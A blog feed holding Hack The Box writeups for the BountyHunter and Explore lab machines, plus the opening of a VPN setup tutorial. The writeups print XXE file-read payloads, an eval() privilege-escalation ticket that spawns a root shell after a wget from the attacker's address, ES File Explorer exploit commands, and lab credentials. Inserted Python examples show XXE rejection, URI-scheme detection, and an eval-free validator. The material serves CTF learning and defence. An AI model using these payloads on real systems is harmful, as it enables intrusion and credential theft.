<p>Javier Olmedo’s Blog (OSWE | Cybersecurity enthusiast and CTF Player). Author: Javier Olmedo, contacto@hackpuntes.com. Feed generated 2021-11-25.</p>
<h1>Hack The Box - Machine - BountyHunter</h1>
<p>Published 2021-11-25, <a href="https://javierolmedo.github.io/htb-machine-bountyhunter">https://javierolmedo.github.io/htb-machine-bountyhunter</a></p>
<!-- BANNER -->
<p><a href="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_banner.png">
<img src="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_banner.png" alt="Hack The Box - Machine - BountyHunter" />
</a></p>
<!-- OVERVIEW -->
<h1 id="overview">Overview</h1>
<p>Welcome to the writeup of the <strong>BountyHunter machine</strong> of the Hack The Box platform. BountyHunter is a Linux-based machine that was active from July 24th to November 20th. On this machine we will find an XXE vulnerability and use it together with a PHP wrapper to read internal files and obtain sensitive information. With that information we will be able to connect to the machine through SSH; once inside, we will analyze a Python script to find how it can be abused to get code execution as the root user and finish the machine.</p>
<!-- BEFORE STARTING -->
<h1 id="before-starting">Before starting</h1>
<h2 id="tmux-for-vpn-connection">Tmux for VPN connection</h2>
<p>Connect to the <strong>Hack The Box VPN</strong> in the background with <code>tmux</code>.</p>
<pre><code class="language-bash">tmux new -s htb
sudo openvpn ~/.vpn/htb.ovpn
</code></pre>
<h2 id="add-to-hosts-file">Add to hosts file</h2>
<p><strong>Add</strong> the machine to the <code>/etc/hosts</code> file, <strong>check the connection</strong> with <code>ping</code> and <strong>create the work folders</strong>.</p>
<pre><code class="language-bash">echo '10.10.11.100 bountyhunter.htb' >> /etc/hosts
ping -c 1 bountyhunter.htb
mkdir -p ~/htb/bountyhunter.htb/{exploits,fuzz,http,nmap}
</code></pre>
<h1 id="recon">Recon</h1>
<h2 id="scan-with-nmap">Scan with nmap</h2>
<p>Check <strong>all ports</strong> that are <strong>open</strong>, detect the service and its version with <code>nmap</code></p>
<pre><code class="language-bash">nmap -sC -sV -p- -T4 --min-rate=1000 -v -oA all bountyhunter.htb
</code></pre>
<pre><code class="language-nmap">PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d4:4c:f5:79:9a:79:a3:b0:f1:66:25:52:c9:53:1f:e1 (RSA)
| 256 a2:1e:67:61:8d:2f:7a:37:a7:ba:3b:51:08:e8:89:a6 (ECDSA)
|_ 256 a5:75:16:d9:69:58:50:4a:14:11:7a:42:c1:b6:23:44 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Bounty Hunters
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</code></pre>
<p><a href="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_nmap.png"><img src="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_nmap.png" /></a></p>
<h2 id="check-website">Check website</h2>
<p>Open Firefox to inspect the website.</p>
<pre><code class="language-bash">firefox http://bountyhunter.htb &
</code></pre>
<p><a href="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_website.png"><img src="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_website.png" /></a></p>
<h2 id="fuzzing-with-gobuster">Fuzzing with gobuster</h2>
<p>Find directories and PHP files</p>
<pre><code class="language-bash">gobuster dir -u "http://bountyhunter.htb/" -w "/usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt" -t 23 -x php -o root_directories_php.fuzz
</code></pre>
<pre><code class="language-txt">/assets (Status: 301) [Size: 321] [--> http://bountyhunter.htb/assets/]
/css (Status: 301) [Size: 318] [--> http://bountyhunter.htb/css/]
/db.php (Status: 200) [Size: 0]
/index.php (Status: 200) [Size: 25169]
/js (Status: 301) [Size: 317] [--> http://bountyhunter.htb/js/]
/portal.php (Status: 200) [Size: 125]
/resources (Status: 301) [Size: 324] [--> http://bountyhunter.htb/resources/]
/server-status (Status: 403) [Size: 281]
</code></pre>
<p>The file <code>db.php</code> is interesting: the response code is <strong>200</strong> but the size is <strong>0</strong>.
Open Burp Suite and navigate through the web page; the <strong>portal link</strong> on the main page goes to the <strong>Bounty Report System</strong>.</p>
<p><a href="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_001.png"><img src="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_001.png" /></a></p>
<p><a href="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_002.png"><img src="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_002.png" /></a></p>
<p>The fields above are assembled into an <strong>XML structure</strong> that is <strong>base64-encoded</strong> before being sent, so it is <strong>time to check for an XXE vulnerability</strong>.</p>
<h1 id="gain-access">Gain Access</h1>
<p>Use the <a href="https://gchq.github.io/CyberChef/">CyberChef</a> tool to generate the payload: apply To Base64 and then URL Encode (encoding special characters).</p>
<p><a href="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_003.png"><img src="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_003.png" /></a></p>
<p>XXE Payload</p>
<pre><code class="language-xml"><?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<bugreport>
<title>&xxe;</title>
<cwe>test</cwe>
<cvss>test</cvss>
<reward>test</reward>
</bugreport>
</code></pre>
<p>Payload (base64, then URL-encoded)</p>
<pre><code class="language-txt">PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KPCFET0NUWVBFIHJlcGxhY2UgWzwhRU5USVRZIHh4ZSBTWVNURU0gImZpbGU6Ly8vZXRjL3Bhc3N3ZCI%2BIF0%2BCjxidWdyZXBvcnQ%2BCiAgICA8dGl0bGU%2BJnh4ZTs8L3RpdGxlPgogICAgPGN3ZT50ZXN0PC9jd2U%2BCiAgICA8Y3Zzcz50ZXN0PC9jdnNzPgogICAgPHJld2FyZD50ZXN0PC9yZXdhcmQ%2BCjwvYnVncmVwb3J0Pg%3D%3D
</code></pre>
<p><a href="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_004.png"><img src="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_004.png" /></a></p>
<p>Do you remember the <code>db.php</code> file found while fuzzing? Read it through the <code>php://filter</code> wrapper so the PHP source is returned base64-encoded instead of being executed.</p>
<pre><code class="language-xml"><?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=db.php"> ]>
<bugreport>
<title>&xxe;</title>
<cwe>test</cwe>
<cvss>test</cvss>
<reward>test</reward>
</bugreport>
</code></pre>
<p>Payload (base64, then URL-encoded)</p>
<pre><code class="language-txt">PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iSVNPLTg4NTktMSI%2FPgo8IURPQ1RZUEUgcmVwbGFjZSBbPCFFTlRJVFkgeHhlIFNZU1RFTSAicGhwOi8vZmlsdGVyL3JlYWQ9Y29udmVydC5iYXNlNjQtZW5jb2RlL3Jlc291cmNlPWRiLnBocCI%2BIF0%2BCjxidWdyZXBvcnQ%2BCiAgICA8dGl0bGU%2BJnh4ZTs8L3RpdGxlPgogICAgPGN3ZT50ZXN0PC9jd2U%2BCiAgICA8Y3Zzcz50ZXN0PC9jdnNzPgogICAgPHJld2FyZD50ZXN0PC9yZXdhcmQ%2BCjwvYnVncmVwb3J0Pg%3D%3D
</code></pre>
<p><a href="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_005.png"><img src="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_005.png" /></a></p>
<pre><code class="language-txt"><?php
// TODO -> Implement login system with the database.
$dbserver = "localhost";
$dbname = "bounty";
$dbusername = "admin";
$dbpassword = "m19RoAU0hP41A1sTsq6K";
$testuser = "test";
?>
</code></pre>
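<p>An added example, not code from the original post: a defender-side handler for the portal's bug-report field that undoes the base64/URL encoding used above, flags DTD and ENTITY declarations together with the <code>php://filter</code> and <code>file:///</code> schemes for a detection rule, and parses only DTD-free reports. The field name, the benign sample report and the helper names are assumptions.</p>

```python
"""Added example (not the original post's code): inspect the base64-encoded,
URL-encoded bug-report XML the BountyHunter portal receives, refuse any
document carrying a DTD (the only place an entity can be declared), and
otherwise return the four report fields."""
import base64
import binascii
import re
import xml.etree.ElementTree as ET
from typing import Dict, List
from urllib.parse import quote, unquote_plus

EXPECTED_FIELDS = ("title", "cwe", "cvss", "reward")
DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)
# URI schemes worth flagging in a detection log: the first two are the ones
# used in this writeup, the rest are common XXE variants.
SUSPICIOUS_SCHEME_RE = re.compile(rb"(php://|file:|expect:|ftp:|https?://)", re.IGNORECASE)

# Constructed samples: a benign report and the php://filter payload from the writeup.
BENIGN_REPORT = (
    '<?xml version="1.0" encoding="ISO-8859-1"?>\n<bugreport>\n'
    '<title>Stored XSS in comments</title><cwe>CWE-79</cwe>'
    '<cvss>6.1</cvss><reward>500</reward>\n</bugreport>'
)
XXE_REPORT = (
    '<?xml version="1.0" encoding="ISO-8859-1"?>\n<!DOCTYPE replace [<!ENTITY xxe SYSTEM '
    '"php://filter/read=convert.base64-encode/resource=db.php"> ]>\n<bugreport>'
    '<title>&xxe;</title><cwe>test</cwe><cvss>test</cvss><reward>test</reward></bugreport>'
)


class XmlRejected(ValueError):
    """Submission refused before (or instead of) XML parsing."""


def encode_submission(xml_text: str) -> str:
    """Build the form value the way the portal does: base64, then URL-encode."""
    return quote(base64.b64encode(xml_text.encode("latin-1")).decode("ascii"), safe="")


def decode_submission(data_param: str) -> bytes:
    """Undo the transport encoding. '+' means space in a form body, so the
    base64 must arrive with '+', '/' and '=' percent-encoded (as CyberChef does)."""
    try:
        return base64.b64decode(unquote_plus(data_param), validate=True)
    except (binascii.Error, ValueError) as exc:
        raise XmlRejected(f"not valid base64: {exc}") from exc


def inspect_submission(data_param: str) -> Dict[str, object]:
    """Cheap, parse-free findings for a WAF rule or a SIEM alert."""
    raw = decode_submission(data_param)
    schemes: List[str] = [m.decode("ascii").lower() for m in SUSPICIOUS_SCHEME_RE.findall(raw)]
    return {
        "has_doctype": DOCTYPE_RE.search(raw) is not None,
        "declares_entity": b"<!ENTITY" in raw.upper(),
        "schemes": sorted(set(schemes)),
    }


def parse_bug_report(data_param: str) -> Dict[str, str]:
    """Parse a report. Any DTD is rejected outright, so no entity (internal,
    external or parameter) can be expanded whatever the parser's defaults are."""
    raw = decode_submission(data_param)
    if DOCTYPE_RE.search(raw):
        raise XmlRejected("DOCTYPE/DTD is not allowed in a bug report")
    try:
        root = ET.fromstring(raw)
    except ET.ParseError as exc:
        raise XmlRejected(f"malformed XML: {exc}") from exc
    if root.tag != "bugreport":
        raise XmlRejected(f"unexpected root element <{root.tag}>")
    report = {}
    for name in EXPECTED_FIELDS:
        node = root.find(name)
        if node is None:
            raise XmlRejected(f"missing <{name}> element")
        report[name] = (node.text or "").strip()
    return report


def is_rejected(data_param: str) -> bool:
    """True when parse_bug_report() refuses the submission."""
    try:
        parse_bug_report(data_param)
    except XmlRejected:
        return True
    return False


if __name__ == "__main__":
    print(parse_bug_report(encode_submission(BENIGN_REPORT)))
    print(inspect_submission(encode_submission(XXE_REPORT)))
    print("XXE payload rejected:", is_rejected(encode_submission(XXE_REPORT)))
```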
<p>Time to check SSH. I could not log in as admin with that password, but the <code>/etc/passwd</code> file extracted earlier shows a user named <code>development</code>.</p>
<p><a href="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_006.png"><img src="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_006.png" /></a></p>
<pre><code class="language-bash">ssh development@bountyhunter.htb
</code></pre>
<p><a href="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_user.png"><img src="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_user.png" /></a></p>
<h1 id="privilege-escalation">Privilege Escalation</h1>
<pre><code class="language-bash">sudo -l
</code></pre>
<p><a href="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_007.png"><img src="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_007.png" /></a></p>
<p>The file <code>/opt/skytrain_inc/ticketValidator.py</code> can be executed with <code>sudo</code> as <strong>root</strong>, so this is where we may be able to escalate.</p>
<pre><code class="language-python">#Skytrain Inc Ticket Validation System 0.1
#Do not distribute this file.
def load_file(loc):
    if loc.endswith(".md"):
        return open(loc, 'r')
    else:
        print("Wrong file type.")
        exit()

def evaluate(ticketFile):
    #Evaluates a ticket to check for irregularities.
    code_line = None
    for i,x in enumerate(ticketFile.readlines()):
        if i == 0:
            if not x.startswith("# Skytrain Inc"):
                return False
            continue
        if i == 1:
            if not x.startswith("## Ticket to "):
                return False
            print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
            continue
        if x.startswith("__Ticket Code:__"):
            code_line = i+1
            continue
        if code_line and i == code_line:
            if not x.startswith("**"):
                return False
            ticketCode = x.replace("**", "").split("+")[0]
            if int(ticketCode) % 7 == 4:
                # the whole user-controlled ticket line reaches eval()
                validationNumber = eval(x.replace("**", ""))
                if validationNumber > 100:
                    return True
                else:
                    return False
    return False

def main():
    fileName = input("Please enter the path to the ticket file.\n")
    ticket = load_file(fileName)
    #DEBUG print(ticket)
    result = evaluate(ticket)
    if (result):
        print("Valid ticket.")
    else:
        print("Invalid ticket.")
    ticket.close()

main()
</code></pre>
<p>Reviewing the code above, the line after <code>__Ticket Code:__</code> is passed to <code>eval()</code> once its first number satisfies <code>% 7 == 4</code>, so you can <strong>create a markdown file</strong>, <code>exploit.md</code>, that achieves command execution:</p>
<pre><code class="language-markdown"># Skytrain Inc
## Ticket to root
__Ticket Code:__
**102 + 10 == 112 and __import__('os').system('/bin/bash') == False
</code></pre>
<pre><code class="language-bash">python -m http.server 80
</code></pre>
<pre><code class="language-bash">cd /tmp
wget http://10.10.15.162/exploit.md
chmod 777 exploit.md
sudo /usr/bin/python3.8 /opt/skytrain_inc/ticketValidator.py
# answer the "path to the ticket file" prompt with:
/tmp/exploit.md
</code></pre>
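<p>An added example, not the box's own script: the rules of <code>ticketValidator.py</code> reimplemented without <code>eval()</code>, using a whitelisting AST walker so the ticket line can only ever be a sum of integer literals. The 64-character limit and the sample tickets are assumptions.</p>

```python
"""Added example (not the box's ticketValidator.py): same ticket rules, but the
validation number is computed by an AST walker that accepts only integer
literals joined by '+', so a crafted line is refused instead of executed."""
import ast
from typing import Iterable, Optional

MAX_EXPR_LEN = 64  # assumed upper bound for a legitimate ticket line

# Constructed sample tickets (format taken from the script above).
VALID_TICKET = "# Skytrain Inc\n## Ticket to Berlin\n__Ticket Code:__\n**102+10+5**\n"
CRAFTED_TICKET = (
    "# Skytrain Inc\n## Ticket to root\n__Ticket Code:__\n"
    "**102 + 10 == 112 and __import__('os').system('/bin/bash') == False\n"
)


def safe_sum(expr: str) -> int:
    """Evaluate 'int + int + ...' and nothing else; anything else raises ValueError."""
    if len(expr) > MAX_EXPR_LEN:
        raise ValueError("expression too long")
    try:
        tree = ast.parse(expr.strip(), mode="eval")
    except SyntaxError as exc:
        raise ValueError(f"not an expression: {exc.msg}") from exc

    def walk(node: ast.AST) -> int:
        if isinstance(node, ast.Constant) and type(node.value) is int:  # bool excluded
            return node.value
        if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
            return walk(node.left) + walk(node.right)
        # Names, calls, attributes, comparisons, bool ops: all refused, so a
        # __import__('os').system(...) never gets a chance to run.
        raise ValueError(f"disallowed syntax: {type(node).__name__}")

    return walk(tree.body)


def rejects(expr: str) -> bool:
    """True when safe_sum() refuses the expression."""
    try:
        safe_sum(expr)
    except ValueError:
        return True
    return False


def evaluate_ticket(lines: Iterable[str]) -> bool:
    """Port of evaluate() from the script above, minus eval()."""
    code_line: Optional[int] = None
    for i, x in enumerate(lines):
        if i == 0:
            if not x.startswith("# Skytrain Inc"):
                return False
            continue
        if i == 1:
            if not x.startswith("## Ticket to "):
                return False
            continue
        if x.startswith("__Ticket Code:__"):
            code_line = i + 1
            continue
        if code_line and i == code_line:
            if not x.startswith("**"):
                return False
            body = x.strip().replace("**", "")
            try:
                if int(body.split("+")[0]) % 7 != 4:
                    return False
                return safe_sum(body) > 100
            except ValueError:  # malformed number or hostile expression
                return False
    return False


def evaluate_ticket_text(text: str) -> bool:
    """Convenience wrapper for a ticket held in memory."""
    return evaluate_ticket(text.splitlines())


if __name__ == "__main__":
    print("valid ticket:", evaluate_ticket_text(VALID_TICKET))
    print("crafted ticket:", evaluate_ticket_text(CRAFTED_TICKET))
```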
<p><a href="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_root.png"><img src="/assets/images/htb-machine-bountyhunter/htb-machine-bountyhunter_root.png" /></a></p>
<h1>Hack The Box - Machine - Explore</h1>
<p>Published 2021-10-30, <a href="https://javierolmedo.github.io/htb-machine-explore">https://javierolmedo.github.io/htb-machine-explore</a></p>
<!-- BANNER -->
<p><a href="/assets/images/htb-machine-explore/htb-machine-explore_banner.png">
<img src="/assets/images/htb-machine-explore/htb-machine-explore_banner.png" alt="Hack The Box - Machine - Explore" />
</a></p>
<p>Welcome to the writeup of the <strong>explore machine</strong> of the Hack The Box platform. Explore is an <strong>easy</strong> difficulty machine on android.</p>
<h1 id="before-starting">Before starting</h1>
<p>Connect to the <strong>Hack The Box VPN</strong> in the background with <code>tmux</code>.</p>
<pre><code class="language-bash">tmux new -s htb
sudo openvpn ~/.vpn/htb.ovpn
</code></pre>
<p><strong>Add</strong> the machine to the <code>/etc/hosts</code> file, <strong>check the connection</strong> with <code>ping</code> and <strong>create the work folders</strong>.</p>
<pre><code class="language-bash">echo '10.10.10.247 explore.htb' >> /etc/hosts
ping -c 4 explore.htb
mkdir -p ~/htb/explore.htb/{exploits,fuzz,http,nmap}
</code></pre>
<h1 id="recon">Recon</h1>
<p>Check <strong>all open ports</strong>, detect the service and its version with <code>nmap</code></p>
<pre><code class="language-bash">nmap -sC -sV -p- -T4 --min-rate=1000 -v -oA all explore.htb
</code></pre>
<pre><code class="language-nmap">Nmap scan report for explore.htb (10.10.10.247)
Host is up (0.048s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
2222/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_ 2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp filtered freeciv
42135/tcp open http ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
44347/tcp open unknown
| fingerprint-strings:
| GenericLines:
| HTTP/1.0 400 Bad Request
| Date: Sat, 30 Oct 2021 11:00:48 GMT
| Content-Length: 22
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| GetRequest:
| HTTP/1.1 412 Precondition Failed
| Date: Sat, 30 Oct 2021 11:00:48 GMT
| Content-Length: 0
| HTTPOptions:
| HTTP/1.0 501 Not Implemented
| Date: Sat, 30 Oct 2021 11:00:53 GMT
| Content-Length: 29
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Method not supported: OPTIONS
| Help:
| HTTP/1.0 400 Bad Request
| Date: Sat, 30 Oct 2021 11:01:08 GMT
| Content-Length: 26
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line: HELP
| RTSPRequest:
| HTTP/1.0 400 Bad Request
| Date: Sat, 30 Oct 2021 11:00:53 GMT
| Content-Length: 39
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| valid protocol version: RTSP/1.0
| SSLSessionReq:
| HTTP/1.0 400 Bad Request
| Date: Sat, 30 Oct 2021 11:01:08 GMT
| Content-Length: 73
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| ?G???,???`~?
| ??{????w????<=?o?
| TLSSessionReq:
| HTTP/1.0 400 Bad Request
| Date: Sat, 30 Oct 2021 11:01:08 GMT
| Content-Length: 71
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| ??random1random2random3random4
| TerminalServerCookie:
| HTTP/1.0 400 Bad Request
| Date: Sat, 30 Oct 2021 11:01:08 GMT
| Content-Length: 54
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
|_ Cookie: mstshash=nmap
59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port2222-TCP:V=7.92%I=7%D=10/30%Time=617D2253%P=x86_64-pc-linux-gnu%r(N
SF:ULL,24,"SSH-2\.0-SSH\x20Server\x20-\x20Banana\x20Studio\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port44347-TCP:V=7.92%I=7%D=10/30%Time=617D2252%P=x86_64-pc-linux-gnu%r(
SF:GenericLines,AA,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDate:\x20Sat,\x2
SF:030\x20Oct\x202021\x2011:00:48\x20GMT\r\nContent-Length:\x2022\r\nConte
SF:nt-Type:\x20text/plain;\x20charset=US-ASCII\r\nConnection:\x20Close\r\n
SF:\r\nInvalid\x20request\x20line:\x20")%r(GetRequest,5C,"HTTP/1\.1\x20412
SF:\x20Precondition\x20Failed\r\nDate:\x20Sat,\x2030\x20Oct\x202021\x2011:
SF:00:48\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(HTTPOptions,B5,"HTTP/1
SF:\.0\x20501\x20Not\x20Implemented\r\nDate:\x20Sat,\x2030\x20Oct\x202021\
SF:x2011:00:53\x20GMT\r\nContent-Length:\x2029\r\nContent-Type:\x20text/pl
SF:ain;\x20charset=US-ASCII\r\nConnection:\x20Close\r\n\r\nMethod\x20not\x
SF:20supported:\x20OPTIONS")%r(RTSPRequest,BB,"HTTP/1\.0\x20400\x20Bad\x20
SF:Request\r\nDate:\x20Sat,\x2030\x20Oct\x202021\x2011:00:53\x20GMT\r\nCon
SF:tent-Length:\x2039\r\nContent-Type:\x20text/plain;\x20charset=US-ASCII\
SF:r\nConnection:\x20Close\r\n\r\nNot\x20a\x20valid\x20protocol\x20version
SF::\x20\x20RTSP/1\.0")%r(Help,AE,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nD
SF:ate:\x20Sat,\x2030\x20Oct\x202021\x2011:01:08\x20GMT\r\nContent-Length:
SF:\x2026\r\nContent-Type:\x20text/plain;\x20charset=US-ASCII\r\nConnectio
SF:n:\x20Close\r\n\r\nInvalid\x20request\x20line:\x20HELP")%r(SSLSessionRe
SF:q,DD,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDate:\x20Sat,\x2030\x20Oct\
SF:x202021\x2011:01:08\x20GMT\r\nContent-Length:\x2073\r\nContent-Type:\x2
SF:0text/plain;\x20charset=US-ASCII\r\nConnection:\x20Close\r\n\r\nInvalid
SF:\x20request\x20line:\x20\x16\x03\0\0S\x01\0\0O\x03\0\?G\?\?\?,\?\?\?`~\
SF:?\0\?\?{\?\?\?\?w\?\?\?\?<=\?o\?\x10n\0\0\(\0\x16\0\x13\0")%r(TerminalS
SF:erverCookie,CA,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nDate:\x20Sat,\x20
SF:30\x20Oct\x202021\x2011:01:08\x20GMT\r\nContent-Length:\x2054\r\nConten
SF:t-Type:\x20text/plain;\x20charset=US-ASCII\r\nConnection:\x20Close\r\n\
SF:r\nInvalid\x20request\x20line:\x20\x03\0\0\*%\?\0\0\0\0\0Cookie:\x20mst
SF:shash=nmap")%r(TLSSessionReq,DB,"HTTP/1\.0\x20400\x20Bad\x20Request\r\n
SF:Date:\x20Sat,\x2030\x20Oct\x202021\x2011:01:08\x20GMT\r\nContent-Length
SF::\x2071\r\nContent-Type:\x20text/plain;\x20charset=US-ASCII\r\nConnecti
SF:on:\x20Close\r\n\r\nInvalid\x20request\x20line:\x20\x16\x03\0\0i\x01\0\
SF:0e\x03\x03U\x1c\?\?random1random2random3random4\0\0\x0c\0/\0");
Service Info: Device: phone
</code></pre>
<p><a href="/assets/images/htb-machine-explore/htb-machine-explore_nmap.png"><img src="/assets/images/htb-machine-explore/htb-machine-explore_nmap.png" /></a></p>
<p>Open Firefox to inspect the website.</p>
<pre><code class="language-bash">firefox http://explore.htb:59777 &
</code></pre>
<p><a href="/assets/images/htb-machine-explore/htb-machine-explore_001.png"><img src="/assets/images/htb-machine-explore/htb-machine-explore_001.png" /></a></p>
<p>Nothing interesting 😥, let’s look for more information.</p>
<p><strong>ES File Explorer</strong> is running on port <strong>42135</strong>; it has a public vulnerability whose PoC from <a href="https://github.com/fs0c131y/ESFileExplorerOpenPortVuln">fs0c131y’s GitHub</a> I had already been testing. I could also see that <a href="https://github.com/alecgorge/jsonapi">JSONAPI</a> is a Bukkit add-on that exposes an API, so perhaps the two are related.</p>
<p>By reading the README.md from the repository, you can generate a payload to test the vulnerability.</p>
<pre><code class="language-bash">curl --header "Content-Type: application/json" --request POST --data '{"command":"getDeviceInfo"}' http://explore.htb:59777
</code></pre>
<p><a href="/assets/images/htb-machine-explore/htb-machine-explore_002.png"><img src="/assets/images/htb-machine-explore/htb-machine-explore_002.png" /></a></p>
<p><a href="/assets/images/others/anthony_adams_rubbing_hands.jpg"><img src="/assets/images/others/anthony_adams_rubbing_hands.jpg" /></a></p>
<p>After searching for interesting files, I found an image containing the credentials of the user <code>kristi</code>, located at <code>/storage/emulated/0/DCIM/creds.jpg</code>.</p>
<pre><code class="language-bash">curl --header "Content-Type: application/json" --request POST --data '{"command":"listPics"}' http://explore.htb:59777
</code></pre>
<p><a href="/assets/images/htb-machine-explore/htb-machine-explore_003.png"><img src="/assets/images/htb-machine-explore/htb-machine-explore_003.png" /></a></p>
<p>To get <code>creds.jpg</code> use this command:</p>
<pre><code class="language-bash">python exploit_ESFileExplorer.py --get-file /storage/emulated/0/DCIM/creds.jpg --host explore.htb
</code></pre>
<p><a href="/assets/images/htb-machine-explore/htb-machine-explore_004.png"><img src="/assets/images/htb-machine-explore/htb-machine-explore_004.png" /></a></p>
<p><a href="/assets/images/htb-machine-explore/htb-machine-explore_005.png"><img src="/assets/images/htb-machine-explore/htb-machine-explore_005.png" /></a></p>
<p>Credentials</p>
<pre><code class="language-txt">kristi:Kr1sT!5h@Rp3xPl0r3!
</code></pre>
<h1 id="gain-access">Gain Access</h1>
<p>The SSH service is running on port <code>2222</code>; connect with the credentials and read the <code>user.txt</code> flag.</p>
<pre><code class="language-bash">ssh -p 2222 kristi@explore.htb
cat /sdcard/user.txt
</code></pre>
<p><a href="/assets/images/htb-machine-explore/htb-machine-explore_user.png"><img src="/assets/images/htb-machine-explore/htb-machine-explore_user.png" /></a></p>
<h1 id="privilege-escalation">Privilege Escalation</h1>
<p>Checking the network connections, we observe that port <code>5555</code> is listening. This port is used by default by <code>ADB</code> (Android Debug Bridge).</p>
<pre><code class="language-bash">netstat -nlpt
</code></pre>
<p><a href="/assets/images/htb-machine-explore/htb-machine-explore_006.png"><img src="/assets/images/htb-machine-explore/htb-machine-explore_006.png" /></a></p>
<p>So let’s <strong>forward</strong> it through SSH and connect to it from our box.</p>
<pre><code class="language-bash">ssh -p 2222 kristi@explore.htb -L 5555:localhost:5555
</code></pre>
<p>Use <code>adb</code> to get root access, then find and read the flag.</p>
<pre><code class="language-bash">adb -s localhost:5555 root
</code></pre>
<pre><code class="language-bash">adb -s localhost:5555 shell
</code></pre>
<pre><code class="language-bash">find / -name "root.txt" 2>/dev/null
</code></pre>
<pre><code class="language-bash">cat /data/root.txt
</code></pre>
<p><a href="/assets/images/htb-machine-explore/htb-machine-explore_root.png"><img src="/assets/images/htb-machine-explore/htb-machine-explore_root.png" /></a></p>
<p><a href="/assets/images/others/boom.gif"><img src="/assets/images/others/boom.gif" /></a></p>
<h1>Create your own log-free VPN</h1>
<p>Published 2020-11-24, <a href="https://javierolmedo.github.io/create-your-own-log-free-vpn">https://javierolmedo.github.io/create-your-own-log-free-vpn</a></p>
<!-- BANNER -->
<p><a href="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_banner.png">
<img src="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_banner.png" alt="Create your own log-free VPN" />
</a></p>
<!-- PREFACE -->
<h1 id="preface">Preface</h1>
<p>Welcome to the tutorial on <strong>how to create our own log-free VPN</strong> by setting up an OpenVPN server on a cloud machine.</p>
<p>Before starting with the tutorial, you must create a machine in the cloud. For this tutorial we have chosen a <strong>DigitalOcean VPS</strong> with an Ubuntu 20.04 machine, which costs $5 per month; through the following <a href="https://m.do.co/c/67dd38080d62">link</a> you can get <strong>$100 for free</strong>.</p>
<!-- CONTENT -->
<h1 id="creating-a-cloud-machine">Creating a cloud machine</h1>
<p>As I mentioned at the beginning, I have chosen DigitalOcean as the VPS provider, but there are others such as Linode, Azure or AWS. To create an Ubuntu 20.04 machine, go to the top right of the panel and select <code>Create -> Droplets</code>.</p>
<p><a href="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_001.png"><img src="/assets/images/create-your-own-log-free-vpn/create-your-own-log-free-vpn_001.png" /></a></p>
